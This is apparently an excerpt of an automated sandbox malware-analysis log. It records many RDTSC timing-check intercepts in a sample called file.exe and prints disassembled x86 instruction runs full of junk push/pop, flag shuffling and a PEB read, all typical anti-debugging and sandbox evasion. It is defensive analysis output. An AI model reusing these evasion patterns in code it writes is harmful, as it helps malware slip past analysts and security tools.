Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E451 second address: 183E45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3650BE6D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E45B second address: 183E46B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F3650C99D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E46B second address: 183E46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E46F second address: 183E497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3650C99D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop esi 0x00000013 push ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 jng 00007F3650C99D9Eh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CA15 second address: 183CA24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3650BE6DA5h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CA24 second address: 183CA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CA2A second address: 183CA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184697F second address: 1846983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1846AFE second address: 1846B1A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F3650BE6D76h 0x00000012 jmp 00007F3650BE6D7Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184D2F2 second address: 184D2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177F26A second address: 177F26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177F26E second address: 177F28B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F3650C99DA4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1854191 second address: 185419B instructions: 0x00000000 rdtsc 0x00000002 js 00007F3650BE6D82h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185745C second address: 1857466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857466 second address: 185746A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 185746A second address: 1857474 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3650C99D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18694BB second address: 18694DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D87h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18694DC second address: 18694E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FA88 second address: 186FA8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FA8D second address: 186FAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3650C99D96h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F3650C99D9Ch 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FC49 second address: 186FC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FD8C second address: 186FDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3650C99DA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F3650C99DA2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FDAB second address: 186FDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FF3D second address: 186FF41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FF41 second address: 186FF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FF4E second address: 186FF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 187033D second address: 1870345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1870345 second address: 1870349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18749A2 second address: 18749A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18749A6 second address: 18749AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1874AFF second address: 1874B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1874B09 second address: 1874B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AF8A3 second address: 18AF8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3650BE6D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0FC1 second address: 18B0FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3650C99DA0h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F3650C99D96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0FE5 second address: 18B0FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B8AAB second address: 18B8AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FA0E second address: 198FA13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FA13 second address: 198FA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FB5B second address: 198FB99 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3650BE6D76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3650BE6D89h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3650BE6D85h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FB99 second address: 198FB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FB9D second address: 198FBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D7Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FBB4 second address: 198FBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FE6A second address: 198FE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3650BE6D76h 0x0000000a pop edx 0x0000000b jbe 00007F3650BE6D87h 0x00000011 jc 00007F3650BE6D7Ch 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FE9F second address: 198FECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F3650C99DA1h 0x00000011 jmp 00007F3650C99D9Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198FECF second address: 198FED4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990062 second address: 1990068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990068 second address: 199006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990770 second address: 1990774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990774 second address: 199077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19908FE second address: 1990907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990907 second address: 199091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3650BE6D7Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 199091E second address: 1990922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1990922 second address: 199093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3650BE6D84h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 199093F second address: 199095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA7h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1992295 second address: 199229F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1994D2E second address: 1994D33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 199523B second address: 19952AF instructions: 0x00000000 rdtsc 0x00000002 js 00007F3650BE6D7Ch 0x00000008 jne 00007F3650BE6D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 jl 00007F3650BE6D88h 0x00000018 jmp 00007F3650BE6D82h 0x0000001d pop edi 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F3650BE6D78h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 push dword ptr [ebp+122D293Ah] 0x0000003f push edx 0x00000040 sub edx, dword ptr [ebp+122D1C3Ch] 0x00000046 pop edx 0x00000047 push E42BCF49h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F3650BE6D83h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0028 second address: 79C002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C002C second address: 79C0030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0030 second address: 79C0036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0036 second address: 79C003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C003C second address: 79C0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0040 second address: 79C0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3650BE6D7Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 call 00007F3650BE6D84h 0x00000018 mov ecx, 6E2128A1h 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F3650BE6D87h 0x00000024 jmp 00007F3650BE6D83h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e mov ecx, 6576907Bh 0x00000033 pushfd 0x00000034 jmp 00007F3650BE6D80h 0x00000039 or ecx, 7E0B6DC8h 0x0000003f jmp 00007F3650BE6D7Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov eax, dword ptr fs:[00000030h] 0x0000004c pushad 0x0000004d mov di, si 0x00000050 popad 0x00000051 sub esp, 18h 0x00000054 pushad 0x00000055 mov ax, dx 0x00000058 call 00007F3650BE6D7Fh 0x0000005d mov ecx, 1A6F211Fh 0x00000062 pop eax 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 pushfd 0x00000069 jmp 00007F3650BE6D7Dh 0x0000006e adc esi, 0F481046h 0x00000074 jmp 00007F3650BE6D81h 0x00000079 popfd 0x0000007a mov si, EAF7h 0x0000007e popad 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0132 second address: 79C016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F3650C99DA4h 0x0000000c sbb cx, F818h 0x00000011 jmp 00007F3650C99D9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movsx edx, si 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C016B second address: 79C0171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0171 second address: 79C0242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F3650C99D9Eh 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3650C99DA0h 0x00000016 push eax 0x00000017 jmp 00007F3650C99D9Bh 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3650C99D9Bh 0x00000024 sbb ecx, 7BC3979Eh 0x0000002a jmp 00007F3650C99DA9h 0x0000002f popfd 0x00000030 popad 0x00000031 mov esi, dword ptr [74E806ECh] 0x00000037 pushad 0x00000038 push eax 0x00000039 mov ebx, 11F73CFEh 0x0000003e pop edi 0x0000003f pushfd 0x00000040 jmp 00007F3650C99DA4h 0x00000045 add eax, 0ACEC0C8h 0x0000004b jmp 00007F3650C99D9Bh 0x00000050 popfd 0x00000051 popad 0x00000052 test esi, esi 0x00000054 pushad 0x00000055 mov bh, al 0x00000057 jmp 00007F3650C99DA1h 0x0000005c popad 0x0000005d jne 00007F3650C9AD30h 0x00000063 jmp 00007F3650C99D9Eh 0x00000068 xchg eax, edi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c mov ax, di 0x0000006f mov ax, dx 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0242 second address: 79C0257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0257 second address: 79C0323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov bh, B7h 0x0000000d pop esi 0x0000000e pushfd 0x0000000f jmp 00007F3650C99D9Bh 0x00000014 sbb ax, B27Eh 0x00000019 jmp 00007F3650C99DA9h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 jmp 00007F3650C99D9Eh 0x00000026 call dword ptr [74E50B60h] 0x0000002c mov eax, 750BE5E0h 0x00000031 ret 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F3650C99D9Eh 0x00000039 xor ax, 2CA8h 0x0000003e jmp 00007F3650C99D9Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F3650C99DA6h 0x0000004b xor ah, 00000008h 0x0000004e jmp 00007F3650C99D9Bh 0x00000053 popfd 0x00000054 mov ecx, 13D7717Fh 0x00000059 popad 0x0000005a popad 0x0000005b push 00000044h 0x0000005d jmp 00007F3650C99DA2h 0x00000062 pop edi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F3650C99DA7h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0323 second address: 79C036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F3650BE6D85h 0x0000000b and ecx, 4FFEDA36h 0x00000011 jmp 00007F3650BE6D81h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b jmp 00007F3650BE6D7Eh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C036F second address: 79C0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0373 second address: 79C0379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0379 second address: 79C03F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3650C99DA4h 0x00000011 sub al, FFFFFFE8h 0x00000014 jmp 00007F3650C99D9Bh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F3650C99DA8h 0x00000020 adc ah, 00000048h 0x00000023 jmp 00007F3650C99D9Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push dword ptr [eax] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3650C99DA5h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C03F4 second address: 79C0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0469 second address: 79C0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0478 second address: 79C047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C047D second address: 79C04C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3650C99DA5h 0x0000000a sbb ecx, 4494C7E6h 0x00000010 jmp 00007F3650C99DA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3650C99D9Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C04C3 second address: 79C0574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F36BE025F46h 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 pushfd 0x00000014 jmp 00007F3650BE6D89h 0x00000019 adc ax, 2956h 0x0000001e jmp 00007F3650BE6D81h 0x00000023 popfd 0x00000024 popad 0x00000025 sub eax, eax 0x00000027 jmp 00007F3650BE6D87h 0x0000002c mov dword ptr [esi], edi 0x0000002e pushad 0x0000002f movzx ecx, bx 0x00000032 pushfd 0x00000033 jmp 00007F3650BE6D81h 0x00000038 and ch, 00000016h 0x0000003b jmp 00007F3650BE6D81h 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [esi+04h], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov ax, dx 0x0000004b jmp 00007F3650BE6D7Fh 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0574 second address: 79C058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C058C second address: 79C0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C0590 second address: 79C0648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov cx, bx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esi+0Ch], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F3650C99DA7h 0x0000001e and si, 500Eh 0x00000023 jmp 00007F3650C99DA9h 0x00000028 popfd 0x00000029 mov dx, ax 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+4Ch] 0x00000030 pushad 0x00000031 mov si, CC0Fh 0x00000035 push esi 0x00000036 pop ecx 0x00000037 popad 0x00000038 mov dword ptr [esi+10h], eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F3650C99DA3h 0x00000042 xor si, BACEh 0x00000047 jmp 00007F3650C99DA9h 0x0000004c popfd 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007F3650C99D9Eh 0x00000054 sub cx, E348h 0x00000059 jmp 00007F3650C99D9Bh 0x0000005e popfd 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
